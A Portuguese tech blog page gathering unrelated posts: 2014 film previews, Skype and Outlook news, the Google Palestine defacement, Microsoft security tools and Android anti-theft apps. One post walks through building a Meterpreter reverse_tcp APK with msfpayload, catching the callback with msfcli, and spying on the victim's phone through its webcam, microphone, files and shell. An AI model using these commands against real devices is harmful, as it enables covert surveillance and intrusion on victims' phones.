Os dez filmes mais esperados para 2014

Transformers 4

trans1

Sempre vale a pena relembrar dessa franquia que enriqueceu Michael Bay. Mais vale também lembrar que Bay não agradou muitos os fãs de Transformers com seu exagero de sentimentalismo humano que tomou conta dos filmes, deixando a proposta inicial da franquia para trás.

Em Transformers 4, a humanidade tenta se reerguer após os eventos de Transformers 3: O Lado Oculto da Lua. Os Autobots e os Deceptions desapareceram da Terra. Porém, um grupo de empresários e cientistas tentam aprender tecnologias com a passagem dos Transformers pela Terra, e acabam levando a tecnologia a um nível além do que eles podem controlar. Ao mesmo tempo, uma ameaça coloca a Terra em perigo.

Transformers 4 está com estreia marcada para: 25 de julho de 2014.

Como Treinar o Seu Dragão 2.

2

O emocionante segundo capítulo da épica trilogia de Como Treinar o seu Dragão nos leva de volta ao fantástico mundo de Hiccup e Thoothless cinco anos após eles terem unido dragões e vikings na ilha de Berk. Enquanto Astrid, Snoutlout e o resto da turma estão desafiando uns aos outros em corridas de dragão (o novo esporte favorito da ilha), a nova dupla inseparável embarca em uma aventura pelos céus, explorando territórios e mundos desconhecidos.

Uma de suas aventuras os leva a descobrir uma caverna de gelo secreta, que é lar de centenas de dragões selvagens e do misterioso Cavaleiro dos Dragões, os dois amigos então, se encontrarão no centro de uma batalha para manter a paz. Hiccup e Toothless deverão se unir para defender o que acreditam, reconhecendo que apenas juntos eles têm poder de mudar o futuro dos homens e dos dragões.

Como Treinar seu Dragão 2 está com estreia marcada para: 20 de junho de 2014.

As Tartarugas Mutantes Ninjas.

3

Quem for da década de 80, como eu, com certeza lembra desses caras. Pois é amigos, eles voltaram para as telonas! Ainda não se descobriu o que irão fazer para contar a origem deles. Houveram spoilers falsos dizendo que a origem das tartarugas ninjas iria ser um pouco diferente do que a que estamos acostumados a lembrar (alienígena), mas foram desmentidos pelo diretor da trama. A sinopse ainda não foi revelada, mas sabemos que nesse filme teremos a ilustre aparição de um velho conhecido, o “Destruidor”.

A data de estreia do filme está prevista para: 27 de junho de 2014.

Need for Speed – O Filme

4

É minha gente…finalmente ele virou filme. Chega de velozes e furiosos, queremos é o tão consagrado jogo da Electronic Arts no cinema, o Need For Speed! O filme baseado no game deve sair no próximo ano e traz consigo com um contexto muito legal, onde
Tobey Marshall (Aaron Paul) é um piloto que foi traído por seu sócio Dino (Dominic Cooper) e acabou sendo preso. Ele começa a começa a planejar uma vingança depois que ganha sua liberdade. Porém, Dino descobre o plano e decide colocar a cabeça de Tobey à prêmio. Isso obriga o corredor a participar de um circuito de corridas ilegais por todo país. O filme é uma adaptação jogo Need For Speed, produzido pela Electronic Arts.

Need For Speed – O Filme, tem data de estréia prevista para: março de 2014.

Capitão América 2

5

O Capitão América com cara de bundão volta as telonas nessa sequência longe de seu tempo. Mais de 50 anos no futuro, Steve enfrenta as diversidades da época atual cheia de iPads e música ruim. Tudo indica que a trama principal rondará a volta de seu parceiro Bucky que volta como o assassino Soldado Invernal. A Shield deve fazer presença nesse filme, então esperaremos ver mais Nick Fury e Maria Hill nas telonas.

Capitão América 2 tem estreia marcada para: 4 de abril de 2014

6- X-Men – Dias de um Futuro Esquecido

6

O filme mais curioso dessa lista. Brian Singer promete uma mistura entre a antiga geração (que é a nova) e a nova geração (que é a antiga) de X-men (confuso, não?). Com o título de um dos melhores quadrinhos dos X-men, Dias de Um Futuro Esquecido, vai buscar unir os dois universos do cinema através de viagens temporais. Como vai ser? Não faço ideia. O filme trará um futuro apocalíptico onde Kitty Pride volta no tempo para evitar que as sentinelas exterminadoras de mutantes sejam criadas. Quase todo o elenco principal dos filmes anteriores está confirmado, deixando a Fox de cabelo em pé com tanto dinheiro gasto.

A data de lançamento do novo X-Men está marcada para o dia: 18 de julho de 2014

Jogos Vorazes: A Esperança

7

Depois de sobreviver duas vezes à crueldade de uma arena projetada para destruí-la, Katniss (Jennifer Lawrence) acreditava que não precisaria mais de lutar. Mas as regras do jogo mudaram: com a chegada dos rebeldes do lendário Distrito 13, enfim é possível organizar uma resistência. Começou a revolução. A coragem de Katniss nos jogos fez nascer a esperança de um país disposto a fazer de tudo para se livrar da opressão. E agora, contra a própria vontade, ela precisa assumir seu lugar como símbolo da causa rebelde. Ela precisa virar o Tordo. O sucesso da revolução dependerá de Katniss aceitar ou não essa responsabilidade. Será que vale a pena colocar sua família em risco novamente? Será que as vidas de Peeta e Gale serão os tributos exigidos nessa nova guerra? Acompanhe Katniss até o fim do “thriller”, numa jornada ao lado mais obscuro da alma humana, em uma luta contra a opressão e a favor da esperança.

“A Esperança” tem data de estreia marcada para: 21 de novembro de 2014

O Hobbit: Lá e de Volta Outra Vez

8

O Hobbit: Lá e de Volta Outra Vez é o último filme da trilogia de filmes baseados na popular obra-prima O Hobbit, de J.R.R. Tolkien. Os três filmes contam uma história contínua ambientada na Terra-Média, 60 anos antes de O Senhor dos Anéis. O Hobbit: Lá e de Volta Outra Vez dá continuidade à aventura de Bilbo Bolseiro (Martin Freeman) em sua épica jornada com o Mago Gandalf (Ian McKellen) e treze Anões, liderados por Thorin Escudo de Carvalho (Richard Armitage), para o Reino dos Anões de Erebor. Esta aventura tem como objetivo recuperar o tesouro dos anões, há muito tempo roubado por um dragão chamado Smaug. Os tesouros haviam sido saqueados por Smaug no tempo de Thror, o avô de Thorin.

O Hobbit tem data de estreia prevista para: 19 de dezembro de 2014

Resident Evil 6

9

Alice (Milla Jovovich), Jill (Sienna Guillory) e o resto dos sobreviventes voltam para onde tudo começou, na mansão construída pela Umbrella Corporation, no centro de pesquisa e desenvolvimento subterrâneo conhecido como Colméia, onde a Rainha Vermelha (Megan Charpentier) planeja a destruição de toda a raça humana. O diretor Paul W. S. Anderson afirmou que este será o último ou penúltimo filme da franquia.

Resident Evill 6 tem data de estreia prevista para: 12 de setembro de 2014

O Espetacular Homem-Aranha 2

10

Em O Espetacular Homem-Aranha 2, a vida de Peter Parker (Andrew Garfield) está bastante agitada – entre enfrentar criminosos como o Homem-Aranha e passar tempo com a garota que ele ama, Gwen (Emma Stone) – a formatura do ensino médio parece algo distante. Peter não se esqueceu da promessa que fez ao pai de Gwen, de que a protegeria mantendo-se longe, mas esta é uma promessa que ele não pode manter. As coisas vão mudar para Peter com o surgimento de um novo vilão, Electro (Jamie Foxx), e o retorno de um velho amigo, Harry Osborn (Dane DeHaan). Enquanto isso, Peter descobre novas pistas sobre seu passado.

Fonte: OperariosdaWeb

Skype está disponível para usuários do Outlook.com no Brasil

Conforme o Skype ganha mais e mais popularidade, também crescem o número de maneiras como os usuários podem se conectar, independentemente do tipo de dispositivos ou serviços que preferem. Esta semana a Microsoft anunciou que o Skype para Outlook.com está totalmente disponível em diversos países, permitindo que os usuários rodem o Skype a partir de suas contas do Outlook.com.

 

 

O Outlook.com é o primeiro serviço de e-mail conectado ao Facebook, Twitter, LinkedIn e Google para ajudar a reunir conteúdo relevante e maximizar as comunicações de todas as caixas de entrada dos usuários.

O e-mail é uma ferramenta pessoal e importante para a maioria das pessoas, mas há alguns momentos nos quais você deseja poder falar ao vivo ou bater papo cara a cara. Em uma pesquisa recente da Ipsos Public Affairs, 76% das pessoas disseram que suas conversas de e-mail frequentemente ou ocasionalmente resultam em uma chamada telefônica ou de vídeo – ou por outros meios de comunicação. Esses momentos são perfeitos para o Skype e, agora, a conexão face a face está na sua Caixa de Entrada a apenas um clique.

O lançamento do Skype no Outlook.com é outro exemplo de como o Skype vem suportando a interoperabilidade entre múltiplas plataformas. Nos últimos meses, uma série de anúncios evidenciou essa flexibilidade. Em julho, o Skype chegou a 100 milhões de instalações em Android. O Skype para Linux e o Skype para iPhone e iPad também foram novidades bem-vindas por usuários open source e do sistema iOS.

O Skype para Outlook.com já está disponível no, Alemanha, Brasil, Canadá, França, Estados Unidos e Reino Unido. Se você ainda não tem o Skype para Outlook.com, crie uma conta clicando aqui. Para saber mais sobre esse anúncio, visite o blog do Outlook.

Google Palestina Hackeado

Mirror do ataque: http://zone-h.org/mirror/id/20623377

 

FONTE: http://www.engenhariae.com.br/colunas/site-da-google-palestina-e-hackeado/

A página inicial do Google Palestina sofreu um ataque nesta segunda-feira (26/08), os responsáveis pelo ataque desfiguraram a página para exibir mensagens políticas no maior buscador do mundo.

As mensagens postadas na página se referiam ao fato de o Google Maps mostrar os territórios palestinos como se fossem pertencentes a Israel, em vez de mostrar claramente o nome “Palestina”.

No site, os hackers deixaram uma mensagem: ”Tio Google, nós dizemos oi da Palestina para lembrá-lo que o país no Google Maps não se chama Israel, se chama Palestina”, dizia a mensagem postada. “Pergunta: o que aconteceria se nós mudássemos o nome do país de Israel para Palestina no Google Maps?”, continuava o texto, que mostrava o mapa da região— em seguida, ainda sugeriram que os visitantes escutassem a cantora Rihanna.

Por volta das 17h35, o endereço google.ps levava para uma página que indicava “conta suspensa”. Segundo o siteZDNet, os servidores do Google não sofreram ataque. Os hackers conseguiram sequestrar o domínio do Google Palestina e redirecioná-lo para outro servidor no Marrocos. O domínio, no entanto, continua sob posse do Google.

Em maio deste ano, o Google trocou o nome de sua página inicial dirigida a usuários palestinos de “Territórios palestinos” para “Palestina”. Na época, o governo de Israel pediu ao Google que reconsiderasse sua decisão. Em uma carta enviada ao CEO do Google, Larry Page, o vice-ministro das Relações Exteriores de Israel, Ze’ev Elkin, afirmou que a medida pode minar os esforços para a paz na região.

O status oficial dos territórios palestinos é um assunto polêmico e ainda sem definição. Em novembro de 2012, a Organização das Nações Unidas (ONU) elevou o status da Palestina de “entidade” para “Estado observador não-membro” – medida que teve amplo apoio dos membros da organização, mas sofreu forte oposição dos Estados Unidos e de Israel.

Por mais que os hackers não estejam satisfeitos com a postura do Google sobre a Palestina, a empresa já tomou alguns pequenos passos para o reconhecimento da nação, que disputa territórios com Israel. A própria página do google.ps passou a exibir o nome “Google Palestinian Territories” para “Google Palestine” (de “Google Territórios Palestinos” para “Google Palestina”).

OUTLOOK PRIVACY PLUGIN – Extensão de segurança para Outlook 2010/2013

Certamente muitos de nossos leitores já sabem o pacote de instalação que fornece Gpg4win, que inclui uma versão de todos os softwares necessários para facilitar a troca de e-mails e arquivos criptografados e assinados. Especificamente:

 

  • GnuPG, mecanismo de criptografia, a ferramenta que controla todo o processo.
  • Kleopatra: o utilitário para gerenciar certificados a partir de uma interface gráfica fácil.
  • GpgOL: Extensão do Outlook para criptografar e assinar e-mails com facilidade.
  • GpgEx: extensão do explorador para criptografar ou descriptografar Direito.
  • Claws Mail:  Um cliente de e-mail.

 

Infelizmente, GpgOL só apoiou versão do Outlook 2003 e 2007, que é um grande problema para estender a ferramenta na casa e pequenas organizações não podem implementar sistemas alternativos.

Graças a Deja vu Security, agora é possível contar com uma extensão  a mais : Outlook Privacy Plugin, que expande o suporte para as versões mais recentes: 2010 e 2013, tanto 32bit e 64bit. Sim, sempre no Windows Vista, 7 ou 2008, uma vez que requer o Framework 4.5. NET e este não está disponível em obsoleto e decadente Windows XP.

A implementação é um pouco pesado, Gpg4win uma vez configurado eo quadro já mencionado 4.5. NET, você também deve instalar o Visual Studio 2010 Tools for Office Runtime Microsoft e, finalmente, a última versão do plugin, que está em contínuo desenvolvimento e fase BETA (ou dito de outra forma, melhor do que nada e ficar pronto para o casque ímpar)

Quando tudo estiver terminado, quando se inicia o Outlook, novas opções aparecem quando compõe uma mensagem, como mostrado nesta figura:

 

A tela de configuração é simples, mas serve as suas funções:

Configuración (botón Settings) del plugin.
🙂

Microsoft: Ferramentas gratuitas de segurança

Durante anos, a Microsoft está intensificando a segurança. Haverá sempre pessoas com o gosto amargo deixado por essas vulnerabilidades tão crítica que arrastaram o primeiro Windows XP, o Server 2003 e todas as suas variantes,  o fato é que os caras em Redmond mudaram.

Hoje é uma empresa que se preocupa com a segurança e investir nela com eventos como a Blue Hat Hacker Conference ou programas de recompensa para falahas no seu navegador.

A grande prova dessa mudança é a publicação de dezenas de ferramentas livres para governar a segurança, aqui está uma lista de muitas delas, algumas mais populares, algumas, pequenos tesouros!

 

PS: A lista está em espanhol!

 

  1. EMET (Enhanced Mitigation Experience Toolkit): posiblemente una de las más avanzadas en cuanto a la protección de vulnerabilidades y exploits, tanto conocidos como desconocidos (APTs).
  2. WinDbg: el debugger de windows, demasiado importante para no mencionarlo.
  3. CAT.NET (Code Analysis Tool .NET): Herramienta de auditoría que permite detectar vulnerabilidades comunes como XSS, SQL Injection o XPath injections.
  4. Attack Surface Analyzer: aplicación que permite sacar una “foto” del estado de un sistema operativo antes y después de ejecutar (o instalar) un software, de esta forma las compara y muestra los cambios que se han realizado. Útil para el análisis de malware.
  5. BinScope Binary Analyzer: utilidad que realiza la validación de una aplicación para asegurarse que cumple con los requisitos descritos en el ciclo de seguridad de desarrollo de Microsoft.
  6. Application Verifier: analiza aplicaciones en busca de errores, también puede detectar vulnerabilidades críticas de seguridad.
  7. SDL Regexp Fuzzer : herramienta para probar expresiones regulares y detectar potenciales denegaciones de servicio.
  8. Sysinternals: conjunto de herramientas imprescindibles para cualquier administrador y analista de seguridad. Por ser de las más populares, no entraré a describir cada una de ellas.
  9. Anti-Cross Site Scripting Library: el nombre lo dice todo, librería para evitar ataques de cross site scripting.
  10. banned.h: fichero cabecera que prohíbe/evita el uso de funciones inseguras.
  11. Microsoft Baseline Security Analyzer: otra herramienta histórica y bien conocida, útil para auditar y fortificar sistemas.
  12. Microsoft Safety Scanner: herramienta para detectar malware en el sistema
  13. Microsoft Security Compliance Manager: es un gran producto para realizar análisis de cumplimiento basados en las guías de fortificación de Microsoft. Por aquí ya hemos hablado de el.
  14. Threat Modeling Tool: aplicación que ayuda a desarrolladores y personal de seguridad a detectar riesgos de seguridad en una fase temprana de desarrollo.
  15. URLScan Security Tool: utilidad para fortificar y hacer algunas funciones adicionales al servicio IIS (ojo, hasta la versión 7.0)
  16. Windows Defender Offline: herramienta para eliminar malware sin arrancar el sistema operativo original del equipo.
  17. Windows Defender: al igual que la anterior, esta aplicación sirve para borrar malware.
  18. AppLocker: aunque no es una aplicación como tal, es una característica que permite bloquear mediante listas blancas/negras las aplicaciones a ejecutar. Complicado de administrar en grandes redes si se despliega correctamente es una opción muy interesante.
  19. Microsoft Security Assessment Tool: utilidad que ayuda a llevar a cabo un análisis de riesgos.
  20. Microsoft Malicious Software Removal Tool: otra aplicación para eliminar malware.
  21. Microsoft Security Essentials: el antivirus gratuito de la compañía, que poco a poco se va implantando en cada vez más sistemas.
  22. MiniFuzz: permite llevar a cabo análisis tipo fuzzering a formatos de ficheros. Está pensada para gente no familiarizada con la seguridad. Lo mismo ya te suena.
  23. FxCop: aplicación para el análisis de código y búsqueda de fallos, tanto de rendimiento como de seguridad (.NET)
  24. Port ReporterPort Reporter Parser: utilidades que permiten generar registros del uso de conexiones, puertos abiertos, etcétera.
  25. DNSLintPortqryNBLookup: antiguas herramientas de depuración y resolución de incidentes, la primera para DNS, la segunda es un simple escáner de puertos y la última permite hacer consultas NetBios.
  26. Network monitorMessage Analyzer: y es que la línea que separa las utilidades de sistema y administración con las de seguridad es muy débil. Haciendo este recopilatorio me daba cosilla no añadir el sniffer de Microsoft.

 

Espero ter ajudado a galera com essa lista que está bem bacana!

Meterpreter + apk = Invadindo Android

O meterpreter em execução no  smartphone é uma das coisas que tava sentindo falta e o mínimo que eu podia fazer, era demonstrar uma prova de conceito.

O aplicativo para gerar o APK vai sr feito via msfpayload, com esta ferramenta podemos gerar shellcodes, tanto para linguagens como C, Javascript, Ruby, como gerar arquivos binários, que contêm o shellcode. O caso típico é o os cavalos de Tróia, ou como gerar um EXE com Meterpreter de shell inversa. Neste caso, vamos usar o aplicativo para gerar um msfpayload APK para o Android, que terá uma atividade principal um tanto curioso, é que realmente o que você executa é o Meterpreter Java modificado para ser executado em um Android. Usaremos o Msfcli para receber a conexão reversa gerado por shellcode que se executa no terminal.

Primeiro gerar o APK com a instrução msfpayload android/meterpreter/reverse_tcp LHOST=<IP donde esperaremos> LPORT=<puerto donde se debe conectar> R > meter.apk.

Uma vez gerado o nosso bug,  o que faremos é configurar para receber a conexão reversa via msfcli … esperar que o bug volte para casa. Para fazer isso, a ferramenta configurada assim:

msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST= <IP QUE RECEBERÁ AS CONEXÕES>

piffa_apk

 

 

Uma vez que a vítima execute o APK se executará a shellcode que se encontra dentro do binario, provocando a conexão inversa. Recordamos que Meterpreter é do tipo Stager, assim será também em duas fases, primeiro de conexão e segundo de funcionalidades.

 

Nós já temos a sessão , o que podemos fazer com isso? Mais tarde, deixo uma lista de comandos disponíveis neste Meterpreter, principalmente as coisas que você poderia fazer com um Meterpreter Java. Bem, como lançar exemplo gráfico de uma captura de imagem através da câmera do próprio aparelho, usando o comando webcam_snap. Com webcam_list comando pode listar as câmeras de dispositivo disponíveis (frente, traseira). Um exemplo de captura de imagem da câmera na parte frontal do smartphone rodando o shellcode:

Temos também disponível comandos para download e upload de arquivos para o dispositivo, além de um shell como você pode ver na imagem:

Comandos do Meterpreter de Android:

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS

Stdapi: Webcam Commands
=======================

    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam

Android Device Manager – Encontrando seu Android

Android Device Manager é um serviço oficial da Google para ajudar quem perdeu o seu dispositivo com Android a encontrá-lo.

A ferramenta funciona a partir da web, ou seja, você não precisa realizar qualquer instalação nem no PC, nem no portátil (tablet ou smartphone).

Tudo o que precisa ser feito é a definição de algumas configurações antes de colocar o serviço em vigor. Assim, você acessa uma página na web e pode encontrar todos os aparelhos que estão vinculados à sua conta da Google. Ainda é possível fazer algumas ações remotas, como apagar dados do aplicativo.

Se você o perdeu dentro do seu quarto e não tem como ligar para ouvir o aparelho tocando, o Android Device Manager também permite que você “ligue” para o aparelho por meio do computador. Enfim, uma ferramenta que pode ajudar a quem não sabe onde seu dispositivo Android foi parar.

Android Device Manager

Configurando o Android Device Manager

Antes de tudo, você mexe no seu dispositivo Android. De modo geral, independente da versão do sistema (este serviço funciona a partir do Android 2.2), deve acessar as configurações e, no menu de localização e segurança, ativar a localização de serviços da Google e o GPS. Feito isso, basta acessar a página do serviço com sua conta da Google no navegador, a mesma utilizada no portátil.

Quando você entra no site do Android Device Manager, pode escolher o aparelho que quer localizar — caso você tenha mais de um vinculado à sua conta, obviamente. Quando seu aparelho é localizado, a posição dele aparece no mapa no fundo da tela.

Android Device Manager

Além disso, é possível enviar uma notificação ao dispositivo para realizar configurações avançadas. Com isso, você define duas funções: a de permitir que o aparelho seja localizado e também que seu conteúdo seja destruído remotamente.

Assim, é possível apagar tudo o que há no aparelho, garantindo a sua privacidade e segurança em caso de roubo ou perda irrecuperável do dispositivo Android.

Eu testei aqui e funcionou perfeito, bem bacana o sistema de manda o aparelho tocar.

Tire foto de quem roubar seu smartphone

iGotYa ou Gotya é um aplicativo que pega bisbilhoteiro de iPhone e Android alheio, pois ele tira uma foto com a câmera frontal do aparelho sempre que alguém tentar acessar o seu iPhone/Android e errar a senha de bloqueio.

O sistema envia a imagem do bisbilhoteiro junto com a localização GPSpara o endereço de e-mail do proprietário do iPhone/Android. Obviamente que o GotYa precisa de conexão Wi-Fi ou 3G para enviar esta informação.

iGotYa só é compatível com o iPhone desbloqueado e está disponível na loja de aplicativos alternativos Cydia Storepor US$6.Quem quiser pode testar, consegue de graça durante 10 dias e com algumas limitações.

Para Android, o Gotya custa R$5,99 – https://play.google.com/store/apps/details?id=com.myboyfriendisageek.gotya&hl=pt_BR

Documentário: Hackers: Criminosos e Anjos (Completo e Dublado)

Hackers: Criminosos e Anjos

Sinopse:
Enquanto as ciências da computação buscam abranger cada vez mais todas as áreas e atividades do nosso cotidiano, governos, empresas e o público em geral tornam-se vítimas do terrorismo cibernético, da espionagem industrial e múltiplas formas de fraude. Este documentário investiga o mundo do crime cibernético: as vítimas, os invasores, seus métodos e suas motivações. Vamos nos aprofundar neste mundo sombrio, enquanto os organismos da lei contam com a ajuda de ex-hackers para tentar proteger cidadãos e instituições do que pode-se prever como um verdadeiro caos eletrônico.

Documentário exibido na Discovery Channel

Duração: 49 Minutos

É meio antigo, mas vale cada minuto a ser visto!!!